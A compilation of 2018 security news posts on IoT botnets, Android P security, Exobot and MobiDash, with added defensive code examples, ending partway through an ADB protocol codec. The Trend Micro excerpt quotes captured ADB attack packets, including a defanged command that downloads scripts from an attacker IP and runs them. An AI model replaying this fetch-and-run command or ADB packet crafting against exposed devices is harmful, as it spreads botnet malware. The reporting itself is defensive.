Security researchers have identified two new threats — Hide ‘N Seek (HNS) and Android Debug Bridge miner (ADB) — which are designed to compromise consumer devices to create Internet of Things (IoT) botnets.

When Fortinet initially tracked HNS in early 2018, the malware was using complex, peer-to-peer communication to compromise routers, IP cameras and DVRs. Over the past several months, the creators added new capabilities. Now, HNS “targets cross-platform database solutions and smart home devices,” according to a July 2018 Fortinet threat report.

Trend Micro discovered a new exploit in early July that uses the Android Debug Bridge (ADB) command line utility, which automatically listens on port 5555, to create a mining botnet. While the threat is currently limited in scope because ADB is turned off by default, Shodan, a search engine for IoT devices, turned up 48,000 exploitable devices.

Mirai-Based Attacks Persist Despite Rising Awareness of IoT Risks

Fortinet noted that HNS uses open source Mirai code to quickly adapt, leveraging a combination of copied code and creative inspiration to add features like code persistence after a reboot. The latest version of HNS also uses nine separate exploits to infect IoT devices.

The ADB threat, meanwhile, is seemingly linked to the Satori version of Mirai and was likely created by the same author, according to a July 2018 IBM X-Force threat advisory. This means that despite increased awareness of IoT threats, Mirai-based attacks are still in development — and still succeeding.

How Can Companies Mitigate the Risk of IoT Botnets?

To protect IoT environments from threats like Mirai, IBM experts recommend changing all default passwords and establishing an incident response team to “conduct regular gap analyses to monitor the data generated by connected devices.”

Organizations should also be aware of emerging Telnet trends in IoT botnets. After the Mirai attack, for example, the use of Telnet as an attack source rose by 140 percent. IBM X-Force researchers suggest limiting Telnet use in corporate environments or replacing it with a stronger alternative such as Secure Shell (SSH).

Sources: Fortinet, Trend Micro

The post Threat Actors Breach Consumer Devices to Build IoT Botnets appeared first on Security Intelligence.

Fortnite for Android to come as Galaxy Note 9 “Exclusive” at launch

Samsung Galaxy Note 9 rumored to offer Fortnite on Android

If rumors are to be believed, then Samsung is reportedly collaborating with the renowned gaming firm, Epic Games to launch “Fortnite” on Android with its upcoming flagship, Galaxy Note 9 next month. According to 9To5Google’s source, “Fortnite” for Android will be exclusive to the Galaxy Note 9 for 30 days and then arrive on other Android handsets shortly after that.

While “Fortnite” has been available for iOS devices since March, it is yet to be launched on Android devices. However, in May this year, Epic Games had announced that they would be bringing the insanely popular battle royale game “Fortnite” on Android this summer.

In a separate report, a source also told XDA that Samsung is interested in advertising the Galaxy Note 9 as a gaming smartphone, and that the device is going to be the first phone to launch with Fortnite Mobile on it. To support gaming on the smartphone, the Galaxy Note 9 will come with a vapor chamber heat pipe to prevent thermal throttling while playing games. It is also rumored to feature high-end specs, including a Qualcomm Snapdragon 845 processor, 6GB of RAM and up to 128GB of internal storage.

Further, the partnership between Samsung and Epic Games will see the South Korean giant offering a promotion worth $100-$150 of V-Bucks (Fortnite‘s in-game currency that can be used to buy skins, customizations, and the works) for people who pre-order a Galaxy Note 9. For those who aren’t interested in the V-Bucks, Samsung will offer a package that nets you a set of wireless AKG headphones. Samsung is also reported to have added the Note series’ S Pen functionality to Fortnite in some way.

While the combination of Samsung and Epic Games definitely sounds exciting, nothing has been officially confirmed by either of the parties. With the Galaxy Note 9 expected to be launched on August 9th, we shall soon find out if the rumors are accurate or not. Keep watching this space for more updates!

The post Fortnite for Android to come as Galaxy Note 9 “Exclusive” at launch appeared first on TechWorm.

New Android P includes several security improvements

According to the Android developer Program Overview, the next major version of Android, Android 9.0 or P, is set to arrive soon. Google's timeline shows a final release within the next three months (Q3 2018).

The end of the Android P beta program is approaching, with the first release candidate built and released in July. As a security company, we simply can’t help but take a close look at what kind of security updates will be included in Android’s newest version.

We are not going to write about new features of Android P, but instead will focus our attention on security improvements. Android P introduces a number of updates that enhance the security of your apps and the devices that run them.

Improved fingerprint authentication

For our own safety, most devices (and many apps) have an authentication mechanism. The new Android P OS provides improved biometrics-based authentication. In Android 8.1, there were two new metrics that helped its biometric system repel attacks: Spoof Accept Rate (SAR) and Imposter Accept Rate (IAR). Along with a new model that splits biometric security into weak and strong, biometric authentication becomes more reliable and trustworthy in Android P.

Android P also promises to deliver a standardized look, feel, and placement for the dialog that requests a fingerprint. This increases users’ confidence that they are interacting with a trusted dialog. App developers can trigger the new system fingerprint dialog using the new BiometricPrompt API, and it is recommended to switch over to the new system dialog as soon as possible. The platform itself selects an appropriate biometric to authenticate with, so developers do not need to implement this logic themselves.

Biometric authentication mechanisms are becoming increasingly popular and they have a lot of potential, but only if designed securely, measured accurately, and implemented correctly.

Signature Scheme v3

Android P adds support for APK Signature Scheme v3. The major difference from v2 is key rotation support, which will be useful for developers: the scheme includes an ApkSignerLineage. As the review committee states:

“The signer lineage contains a history of signing certificates with each ancestor attesting to the validity of its descendant. Each additional descendant represents a new identity that can sign an APK. In this way, the lineage contains a proof of rotation by which the APK containing it can demonstrate, to other parties, its ability to be trusted with its current signing certificate, as though it were signed by one of its older ones. Each signing certificate also maintains flags which describe how the APK itself would like to trust the old certificates, if at all, when encountered.”

This lets you sign with a new certificate easily: you link the new certificate to the old ones in the lineage, so an APK signed with the new certificate is trusted as though it were signed by one of the old ones.

Although Scheme v3 is enabled by default, note that you can still sign with an old signing certificate.

HTTP Secure (HTTPS) by default

Nowadays, many apps still transmit users’ information unencrypted, leaving personal data exposed to hackers. People bothered by the potential for a breach or invasion of privacy can feel more secure knowing that their transmissions in Android P will be secure by default.

In Android P, third-party developers will have to use HTTPS for their apps (it was optional in Android 8.0). However, they can still ignore the advice and specify certain domains that may carry unencrypted traffic.
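The per-domain exemption described above is expressed through the app's Network Security Configuration file, referenced from the manifest as `android:networkSecurityConfig="@xml/network_security_config"`. The following is an added example, not code from the original post: the first document shows the weak setting that silently undoes the Android 9 default for the whole app, the second keeps the default and exempts a single named host. The host name `legacy-telemetry.example.com` is a placeholder.

```xml
<!-- res/xml/network_security_config.xml -->

<!-- WEAK: permits cleartext for every host the app talks to, which reverts the
     Android 9 secure-by-default behaviour for this app. -->
<network-security-config>
    <base-config cleartextTrafficPermitted="true" />
</network-security-config>

<!-- HARDENED: keep cleartext off globally; carve out one legacy host explicitly
     so the exception is visible in code review and can be removed once that host
     supports TLS. Trust anchors are limited to the platform CA store, so a
     user-installed CA cannot be used to intercept the app's HTTPS traffic. -->
<network-security-config>
    <base-config cleartextTrafficPermitted="false">
        <trust-anchors>
            <certificates src="system" />
        </trust-anchors>
    </base-config>
    <domain-config cleartextTrafficPermitted="true">
        <!-- placeholder host; includeSubdomains="false" keeps the exemption narrow -->
        <domain includeSubdomains="false">legacy-telemetry.example.com</domain>
    </domain-config>
</network-security-config>
```

The practical check for a reviewer is to grep an app's resources for `cleartextTrafficPermitted="true"` on a `base-config` element: that is the setting that re-opens plaintext for everything, whereas a `domain-config` exemption is at least scoped and auditable.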

Protected confirmation

A protected confirmation API exists in all devices launched with Android P. Using this API, apps can use the ConfirmationPrompt class to display confirmation prompts to the user, asking them to approve a short statement. This statement allows the app to confirm that the user would like to complete a sensitive transaction, such as making a bill payment.

As soon as the user accepts the statement, your app receives a cryptographic signature, protected by a keyed-hash message authentication code (HMAC). The signature is produced by the trusted execution environment (TEE), which protects both the display of the confirmation dialog and the user’s input. The signature indicates, with high confidence, that the user has seen the statement and agreed to it.

Hardware security module

Here’s an additional update that benefits everyone: devices with Android P will support a StrongBox Keymaster. The module has its own CPU, secure storage, and a true random number generator. It also protects against package tampering and unauthorized sideloading of apps.

To support StrongBox implementations, Android P uses a subset of algorithms and key sizes:

  • RSA 2048
  • AES 128 and 256
  • ECDSA P-256
  • HMAC-SHA256 (supports key sizes between 8 bytes and 64 bytes, inclusive)
  • Triple DES 168
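The three pieces described above (the BiometricPrompt dialog, the ConfirmationPrompt statement, and a StrongBox-backed key) fit together in one flow: generate a P-256 signing key in the hardware keystore, then only let it sign after the user has either authenticated biometrically or approved a statement in the protected dialog. The following is an added example targeting Android 9 (API 28); it is not code from the Malwarebytes post. The `Callback` interface, the key alias, the prompt strings and the bank/payee names are assumptions made for illustration.

```java
import android.app.Activity;
import android.content.Context;
import android.hardware.biometrics.BiometricPrompt;
import android.os.CancellationSignal;
import android.security.ConfirmationCallback;
import android.security.ConfirmationPrompt;
import android.security.keystore.KeyGenParameterSpec;
import android.security.keystore.KeyProperties;
import android.security.keystore.StrongBoxUnavailableException;

import java.security.KeyPairGenerator;
import java.security.KeyStore;
import java.security.PrivateKey;
import java.security.Signature;
import java.util.concurrent.Executor;

/** Added example (not from the original post) for the Android 9 (API 28) APIs named above. */
public final class AndroidPSecurityDemo {
    private static final String KEYSTORE = "AndroidKeyStore";

    /** Hypothetical app-side callback: receives the signature bytes or a failure reason. */
    public interface Callback {
        void onSigned(byte[] signature);
        void onFailed(String reason);
    }

    /**
     * Generates a P-256 signing key in the Android Keystore, preferring StrongBox.
     * Returns true if the key landed in StrongBox, false if it fell back to the TEE-backed store.
     * requireAuth: the key only signs right after a successful BiometricPrompt.
     * requireConfirmation: the key only signs bytes the user approved in a ConfirmationPrompt.
     */
    public static boolean createSigningKey(String alias, boolean requireAuth,
                                           boolean requireConfirmation) throws Exception {
        KeyGenParameterSpec.Builder spec =
                new KeyGenParameterSpec.Builder(alias, KeyProperties.PURPOSE_SIGN)
                        .setDigests(KeyProperties.DIGEST_SHA256)
                        .setUserAuthenticationRequired(requireAuth)
                        .setInvalidatedByBiometricEnrollment(true) // newly enrolled fingers cannot reuse the key
                        .setUserConfirmationRequired(requireConfirmation);
        KeyPairGenerator kpg = KeyPairGenerator.getInstance(KeyProperties.KEY_ALGORITHM_EC, KEYSTORE);
        try {
            kpg.initialize(spec.setIsStrongBoxBacked(true).build());
            kpg.generateKeyPair();
            return true;
        } catch (StrongBoxUnavailableException e) {
            kpg.initialize(spec.setIsStrongBoxBacked(false).build()); // device has no StrongBox
            kpg.generateKeyPair();
            return false;
        }
    }

    private static Signature signatureFor(String alias) throws Exception {
        KeyStore ks = KeyStore.getInstance(KEYSTORE);
        ks.load(null);
        Signature sig = Signature.getInstance("SHA256withECDSA");
        sig.initSign((PrivateKey) ks.getKey(alias, null));
        return sig;
    }

    /** Shows the system fingerprint dialog; the key is usable only inside onAuthenticationSucceeded. */
    public static void signWithBiometric(Activity activity, String alias, byte[] challenge,
                                         Executor executor, Callback cb) throws Exception {
        BiometricPrompt prompt = new BiometricPrompt.Builder(activity)
                .setTitle("Confirm it's you")
                .setDescription("Sign in to Example Bank")
                .setNegativeButton("Cancel", executor, (d, which) -> cb.onFailed("user cancelled"))
                .build();
        prompt.authenticate(new BiometricPrompt.CryptoObject(signatureFor(alias)),
                new CancellationSignal(), executor, new BiometricPrompt.AuthenticationCallback() {
                    @Override public void onAuthenticationSucceeded(BiometricPrompt.AuthenticationResult r) {
                        try {
                            Signature s = r.getCryptoObject().getSignature();
                            s.update(challenge);          // server-issued nonce: proves freshness
                            cb.onSigned(s.sign());
                        } catch (Exception e) { cb.onFailed(e.toString()); }
                    }
                    @Override public void onAuthenticationError(int code, CharSequence msg) {
                        cb.onFailed("biometric error " + code + ": " + msg);
                    }
                });
    }

    /** TEE-rendered dialog; the confirmation-bound key will only sign the exact bytes the user saw. */
    public static void confirmAndSign(Context ctx, String alias, String statement, byte[] nonce,
                                      Executor executor, Callback cb) throws Exception {
        if (!ConfirmationPrompt.isSupported(ctx)) {
            cb.onFailed("Protected Confirmation not available on this device");
            return;
        }
        ConfirmationPrompt prompt = new ConfirmationPrompt.Builder(ctx)
                .setPromptText(statement)   // e.g. "Pay 50.00 EUR to Example Power Co" (placeholder)
                .setExtraData(nonce)        // binds this approval to one server-side transaction
                .build();
        prompt.presentPrompt(executor, new ConfirmationCallback() {
            @Override public void onConfirmed(byte[] dataThatWasConfirmed) {
                try {
                    Signature s = signatureFor(alias);
                    s.update(dataThatWasConfirmed); // CBOR-encoded prompt text + extra data
                    cb.onSigned(s.sign());          // the server verifies it with the enrolled public key
                } catch (Exception e) { cb.onFailed(e.toString()); }
            }
            @Override public void onDismissed() { cb.onFailed("user dismissed"); }
            @Override public void onCanceled() { cb.onFailed("app cancelled"); }
            @Override public void onError(Throwable t) { cb.onFailed(t.toString()); }
        });
    }
}
```

Two design points matter for the verifier on the server side: the public key should be registered once (ideally with a key attestation chain showing it is hardware-backed), and the signed bytes must be checked to contain the server's own nonce and the expected statement text, otherwise a replayed or re-worded approval would be accepted.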

Peripherals background policy

With Android P, apps running in the background will not be able to access your smartphone’s microphone, camera, or sensors. Users get a notification when an app attempts to access these in the background. On such an attempt, the microphone reports empty audio, cameras disconnect (causing an error if the app tries to use them), and all sensors stop reporting events.

Backup data encryption update

It’s no secret that Android backs up data from your device; users can then restore that data after signing into their Google account on another device. Starting with Android P, the backup encryption uses a client-side secret. This means encryption is done locally on the device, whereas before, a backup of your device was encrypted on the server.

Because of this new privacy measure, users will need the device’s PIN, pattern, or password to restore data from the backups made by their device.

Wrapping things up

All these improvements mean only one thing: It’ll be significantly harder for criminals to access your data when they shouldn’t be able to. With the massive amounts of breaches over the last two years, this should come as a relief for consumers, who simply want to use their phones without fear of privacy being compromised.

The post New Android P includes several security improvements appeared first on Malwarebytes Labs.

Blog | Avast EN: Build-your-own banking trojan, ransomware on the high seas, and SIM card chaos | Avast

Source code to Exobot banking trojan leaked

“This has happened in the past, and it poses a risk as we saw in the case of the infamous Mirai botnet,” says Avast Security Evangelist Luis Corrons, speaking to the news that the source code to a potent bank trojan known as Exobot has been released into the wild of the dark web for anyone who cares to use it for their own ill will. The publicly-shared Mirai source code gave malware architects the blueprints to a powerful botnet, upon which they expanded. “Many malware writers used it to create their own customized version of the bot. We can expect the same here,” adds Luis.


Mac Virus: Mobile Malware – Android and iOS

Catalin Cimpanu: Chrome Extensions, Android and iOS Apps Caught Collecting Browsing Data – “An investigation by AdGuard, an ad-blocking platform, has revealed a common link between several Chrome and Firefox extensions and Android & iOS apps that were caught collecting highly personal user data through various shady tactics.”

Pierluigi Paganini: CSE Malware ZLab – APT-C-27’s long-term espionage campaign in Syria is still ongoing. After ESET’s Lukas Stefanko revealed the existence of a repository containing Android applications, researchers from CSE Cybsec Z-Lab identified spyware that was “part of the arsenal of an APT group tracked as APT-C-27, aka Golden Rat Organization.” In recent years the group has been focusing its activities in Syria. Here’s the ZLAB Malware Analysis Report.

The Hacker News: iPhone Hacking Campaign Using MDM Software Is Broader Than Previously Known – “India-linked highly targeted mobile malware campaign, first unveiled two weeks ago, has been found to be part of a broader campaign targeting multiple platforms, including windows devices and possibly Android as well.”

Sophos: Red Alert 2.0: Android Trojan targets security-seekers – “A malicious, counterfeit version of a VPN client for mobile devices targets security-minded victims with a RAT.”

David Bisson for Tripwire: Exobot Android Banking Trojan’s Source Code Leaked Online -“Bleeping Computer said it received a copy of the source code from an unknown individual in June. In response, it verified the authenticity of the code with both ESET and ThreatFabric…Exobot is a type of malware that targets Android users via malicious apps. Some of those programs made their way onto the Google Play Store at one point.”

David Harley



Popular Android/iOS Apps & Extensions Collecting “Highly Personal” User data

By Waqas

In May this year, HackRead reported how an Israeli company Unimania was caught collecting personal, Facebook and browsing data of users through Android apps and Chrome extensions. Now, researchers have discovered another “spyware” campaign aiming at stealing personal data of users but this time it is far bigger than the one previously reported. Ad-blockers and security […]

This is a post from HackRead. Read the original post: Popular Android/iOS Apps & Extensions Collecting “Highly Personal” User data

VLC Blacklists Newer Huawei Devices To Combat Negative App Reviews

An anonymous reader quotes a report from The Verge: Some newer Huawei phones are actively being blocked from installing the open-source VLC media player app from Google Play. VLC's developers announced today that they're blacklisting some of Huawei's devices after unhappy users left too many one-star reviews for the app. But the negative reviews stem from a decision on Huawei's part and have nothing to do with VLC. The negative reviews are a result of Huawei's aggressive battery management and tendency to kill background apps, which directly affects VLC's background audio playback feature. Huawei users on VLC's forums are well aware of the issue. It's possible to manually disable these battery optimizations and have the app function properly in the background, but VLC claims that people often don't know how to do that, so they blame the app instead. The devices being blacklisted are the Huawei P8, P10, and P20. Users can still manually download the APK from VLC's website if they're interested in using the player.

Read more of this story at Slashdot.

Expert says: Hack your Smart Home to Secure It

Smart home security starts at home, according to researcher Michael Sverdlin who says that consumers should explore the security of their smart home technology and consider simple modifications or hacks to remove insecure or promiscuous features. Not long ago, Michael Sverdlin, the back-end team leader for IoT security startup Vdoo, bought his...

Read the whole entry... »


Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency

It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.

In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.

Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.

The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb). According to the Google developer portal:

“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”

These are very powerful functions for a debugging tool, and also useful for executing malicious code without being caught by the usual security controls. As long as adb is used in a secured environment, it presents little risk. It is recommended that the adb service be disabled before releasing devices to consumers, and it is common for the adb service to be restricted to USB connectivity only.

In early June, security researcher Kevin Beaumont warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He goes on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet: “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It only took one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.

According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”

[Image: ADB port debugging tools]

The Trend Micro researchers’ analysis shows a fairly typical command and control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts, which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server, then scans the processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.

It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.

The Trend Micro researchers offer a few suggestions to reduce your risk:

  • On your mobile device, go to Settings, select “Developer Options” and ensure that “ADB (USB) debugging” and “Apps from Unknown Sources” are turned off
  • Apply recommended patches and updates from the vendor
  • Perform a factory reset to erase the malware if you believe you are infected
  • Update intrusion prevention systems (IPS) to block potentially malicious code from reaching your device

The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.
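The first of the Trend Micro recommendations above can be checked programmatically. The following is an added example, not code from the Security Affairs post: a posture check that a mobile threat prevention or device-management app could run on-device to surface USB debugging, unlocked developer options and sideloading permission. The setting names come from the public `android.provider.Settings` API; the `Finding` type and report format are assumptions made for this example.

```java
import android.content.ContentResolver;
import android.content.Context;
import android.os.Build;
import android.provider.Settings;

import java.util.ArrayList;
import java.util.List;

/** Added example (not from the original post): on-device debugging/sideloading exposure check. */
public final class DebugExposureCheck {

    /** One flagged setting and why it matters (assumed shape for this example). */
    public static final class Finding {
        public final String setting, why;
        Finding(String setting, String why) { this.setting = setting; this.why = why; }
        @Override public String toString() { return setting + ": " + why; }
    }

    /** Reads each relevant setting; a missing value is treated as "off" (default 0). */
    public static List<Finding> inspect(Context ctx) {
        ContentResolver cr = ctx.getContentResolver();
        List<Finding> findings = new ArrayList<>();

        if (Settings.Global.getInt(cr, Settings.Global.ADB_ENABLED, 0) == 1) {
            // The public API cannot reveal whether adbd is also bound to TCP 5555 (that is a
            // system property), so ADB being enabled at all is the closest observable signal.
            findings.add(new Finding("adb_enabled",
                    "ADB debugging is on; a vendor build that also enabled ADB over TCP exposes port 5555"));
        }
        if (Settings.Global.getInt(cr, Settings.Global.DEVELOPMENT_SETTINGS_ENABLED, 0) == 1) {
            findings.add(new Finding("development_settings_enabled",
                    "Developer options are unlocked, so debugging can be re-enabled from the UI"));
        }
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            // Android 8.0+ replaced the global "unknown sources" switch with a per-app permission,
            // so an app can only see its own sideloading capability.
            if (ctx.getPackageManager().canRequestPackageInstalls()) {
                findings.add(new Finding("REQUEST_INSTALL_PACKAGES",
                        "This app may sideload APKs; keep it off unless the app is a managed installer"));
            }
        } else if (Settings.Secure.getInt(cr, Settings.Secure.INSTALL_NON_MARKET_APPS, 0) == 1) {
            findings.add(new Finding("install_non_market_apps",
                    "Apps from unknown sources are allowed device-wide"));
        }
        return findings;
    }

    /** Human-readable summary for a compliance report or admin notification. */
    public static String report(List<Finding> findings) {
        if (findings.isEmpty()) return "OK: no debugging or sideloading exposure detected";
        StringBuilder sb = new StringBuilder("WARN: ").append(findings.size()).append(" finding(s)\n");
        for (Finding f : findings) sb.append(" - ").append(f).append('\n');
        return sb.toString();
    }
}
```

Because the TCP listener itself is not visible through the public API, the authoritative test for the 5555 exposure the article describes remains a scan of your own network segment (or a firewall rule that logs and drops inbound connections to that port); the on-device check is a complement that catches the setting before a device ever leaves the lab.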

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting and is a frequent speaker on ICS, IoT and Blockchain risk topics. He is currently Global CISO for the ATCO Group of companies.

Pierluigi Paganini

(Security Affairs – debugging tools, hacking)

The post Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency appeared first on Security Affairs.

Mobile Menace Monday: Adware MobiDash gets stealthy

The adware known as MobiDash, detected by Malwarebytes for Android as Android/Adware.MobiDash, is far from new. However, this ad-displaying nuisance now comes with some additional stealth features.

First appearing last spring, these new features are not limited to a single variant of MobiDash. Instead, what the stealth versions have in common is the package name. As a result, these stealth features hide the existence of Adware MobiDash, even when it’s in plain sight!

Look closer

When I first came upon this stealthy MobiDash, a customer was having a terrible time removing the adware from their mobile device. Malwarebytes for Android was unable to remove it, due to it being an active device administrator.

By design of the Android operating system, any app granted device administrator privileges cannot be uninstalled until it has first been removed from the device administrator list. Attempting to uninstall an app with device administrator rights displays the screen shown above, which warns that the app cannot be uninstalled and provides a link to the device administrator list.

Okay, simple enough: just remove the offending piece of adware from the list and uninstall, right? Well, what if it doesn’t exist in the device administrator list!? Have a look for yourself below.

There’s “Find My Device” and “Malwarebytes,” both with legitimate reasons to be in the device administrator’s list. But there’s no adware app in sight.

But wait. Look a little closer.

That blank line right at the bottom of list—bingo! If you didn’t see it at first, you’re not alone.

Even more stealth

After removing Adware MobiDash from the device administrator list (now that you can see it), the next step is uninstalling. By far the easiest method is to rescan with Malwarebytes for Android, which will then uninstall it for you. Manual removal is also possible, though it’s a bit trickier.

Manual removal

Depending on your mobile device’s Android OS version, there may be a shortcut icon disguising itself as Settings.

If this exists alongside with the real Settings icon, simply drag the fake Settings icon to Uninstall.

However, in many cases this icon doesn’t exist, so the app must be removed via the device’s app list: Settings > Apps. Scroll all the way to the bottom of the list, and you’ll discover a blank entry at the very end.

Click on it, and you can uninstall from the app info screen.

The how and why

So how, exactly, does this stealth MobiDash version get device administrator rights? It must be granted manually by the user. It’s surprisingly easy for a user to do so by mistake, and even easier with this piece of adware. Why? Because granting an app device administrator rights usually comes with a list of scary operations to allow. This MobiDash version doesn’t ask for any, as shown below.

So why did it even bother tricking users into activating device administrator if there are no operations to allow? As highlighted above, it makes uninstalling way more tedious—especially with the extra stealth features.

It happens

I could preach about not activating device administrator to unknown apps, but instead I’ll just say, “It happens.” On Android, there are an abundance of features you must allow to get legitimate apps to work properly. This sometimes exhausts users to the point of just blindly allowing everything. It’s no wonder that the bad apps can slip under the radar.

Luckily in this case, the outcome is simply annoying ads and nothing worse. But if you don’t want to deal with the hassle of an adware infection, slowing down and being a little more vigilant can save you time in the long run. Stay safe out there!

The post Mobile Menace Monday: Adware MobiDash gets stealthy appeared first on Malwarebytes Labs.

The source code of the Exobot Android banking trojan has been leaked online

The source code of the Exobot Android banking trojan has been leaked online, researchers already verified its authenticity.

The source code of the Exobot Android banking trojan has been leaked online, and experts believe we will soon see a new wave of attacks based on the malware.

The Exobot Android banking trojan was first spotted at the end of 2016 when its authors were advertising it on the dark web.

The authors advertised it as suitable for phishing attacks and as implementing the features common to most banking Trojans, such as intercepting SMS messages.

Exobot is a powerful banking malware that is capable of infecting even smartphones running the latest Android versions.

In January, the authors decided to stop working on the malware and put its source code up for sale.

Now researchers from Bleeping Computer confirmed to have received a copy of the source code from an unknown individual and shared it with malware researchers from ESET and ThreatFabric in order to verify its authenticity.

“The code proved to be version 2.5 of the Exobot banking trojan, also known as the “Trump Edition,” one of Exobot’s last version before its original author gave up on its development.” reads a blog post published by Bleeping Computer.

Exobot Android banking trojan

According to experts from ThreatFabric, the version provided to Bleeping Computer was leaked online in May. It seems that one of the users who purchased the malicious code decided to leak it.

According to the experts, the source code for the Exobot Android banking Trojan is now being distributed on a few underground hacking forums. This means that threat actors can now build their own versions and also offer them under a malware-as-a-service model.

“In the coming months, we may see Android malware devs slowly migrating their campaigns from BankBot to Exobot, as few will decline a “free upgrade” to a better code.” concluded Bleeping Computers.

Pierluigi Paganini

(Security Affairs – Android,  banking Trojan)

The post The source code of the Exobot Android banking trojan has been leaked online appeared first on Security Affairs.

TrendLabs Security Intelligence Blog: Open ADB Ports Being Exploited to Spread Possible Satori Variant in Android Devices

by Hubert Lin, Lorin Wu, and Vit Sembera

The exploitation of open ports on devices has been an on-going problem for many IoT users. TCP port 5555, in particular, has had issues in the past due to product manufacturers leaving it open before shipping, which potentially exposes users to attackers.

Recently, we found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. In this scenario, the activity involves the command line utility called Android Debug Bridge (ADB), a part of the Android SDK that handles communication between devices and also allows developers to run and debug apps on Android devices. Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.

Figure 1. Activity in the TCP Port 5555 from July 1 to July 15. Note the spike on July 9 and 10 and a second spike on July 15

Technical Analysis

From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary.

It attacks ADB by uploading the payload via TCP port 5555:

  • “CNXN”,0,0,0,1,0,0×10,0,0,7,0,0,0,”2″,2,0,0,0xBC,0xB1,0xA7,0xB1,”host::”

Once it’s dropped onto a device, the payload deletes itself from disk and is renamed with a randomly selected name with an architecture string attached.

The payload will download the shell script, which is removed after execution:

  • “OPENX”,2,0,0,0,0,0,0,0xF2,0x17,”J”,0,0,0xB0,0xAF,0xBA,0xB1,”shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]62[.]189[.]149/adbs -O -> adbs; sh adbs; curl hxxp://185[.]62[.]189[.]149/adbs2 > adbs2; sh adbs2; rm adbs adbs2″
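The two captures above are raw ADB wire-protocol messages. Every message is a 24-byte little-endian header (command, arg0, arg1, data length, data checksum, magic) followed by the payload; the checksum is the byte sum of the payload and the magic is the command word XOR 0xFFFFFFFF. That is why the CNXN header ends in BC B1 A7 B1 and the OPEN header in B0 AF BA B1, and why the CNXN checksum is 0x232 (the byte sum of “host::” plus its NUL). With the defanging undone, the “shell:…” command string quoted above is 241 bytes plus the terminating NUL, 242 = 0xF2, which matches the length field in the captured OPEN header. The codec below is an added example (not Trend Micro’s code) that packs and validates such messages and pulls the command line out of an OPEN to a `shell:` service, which is what a scanner needs to recognise this traffic; the CNXN bytes are the ones quoted in the post, written out as a byte string.

```python
"""ADB wire-protocol codec (added example, not code from the Trend Micro post).

Message layout (all fields little-endian 32-bit):
    command | arg0 | arg1 | data_length | data_checksum | magic
data_checksum = sum of payload bytes, magic = command ^ 0xFFFFFFFF.
"""
import struct

HEADER = struct.Struct("<IIIIII")  # 24-byte header


def cmd_id(name: bytes) -> int:
    """Four ASCII characters packed little-endian, e.g. b"CNXN" -> 0x4E584E43."""
    return struct.unpack("<I", name)[0]


A_CNXN = cmd_id(b"CNXN")
A_OPEN = cmd_id(b"OPEN")
A_OKAY = cmd_id(b"OKAY")
A_WRTE = cmd_id(b"WRTE")
A_CLSE = cmd_id(b"CLSE")


def checksum(data: bytes) -> int:
    return sum(data) & 0xFFFFFFFF


def pack_message(command: int, arg0: int, arg1: int, data: bytes = b"") -> bytes:
    """Build one ADB message with a correct length, checksum and magic."""
    header = HEADER.pack(command, arg0, arg1, len(data), checksum(data),
                         command ^ 0xFFFFFFFF)
    return header + data


def parse_message(buf: bytes) -> dict:
    """Decode one message, rejecting anything whose magic, length or checksum is wrong."""
    if len(buf) < HEADER.size:
        raise ValueError("short header")
    command, arg0, arg1, length, csum, magic = HEADER.unpack_from(buf, 0)
    if magic != command ^ 0xFFFFFFFF:
        raise ValueError("bad magic: not an ADB message")
    data = buf[HEADER.size:HEADER.size + length]
    if len(data) != length:
        raise ValueError("truncated payload")
    if checksum(data) != csum:
        raise ValueError("payload checksum mismatch")
    return {"command": struct.pack("<I", command).decode("ascii"),
            "arg0": arg0, "arg1": arg1, "data": data}


def is_valid_message(buf: bytes) -> bool:
    try:
        parse_message(buf)
        return True
    except ValueError:
        return False


def shell_command(msg: dict):
    """Return the command line if `msg` is an OPEN of a `shell:` service, else None.
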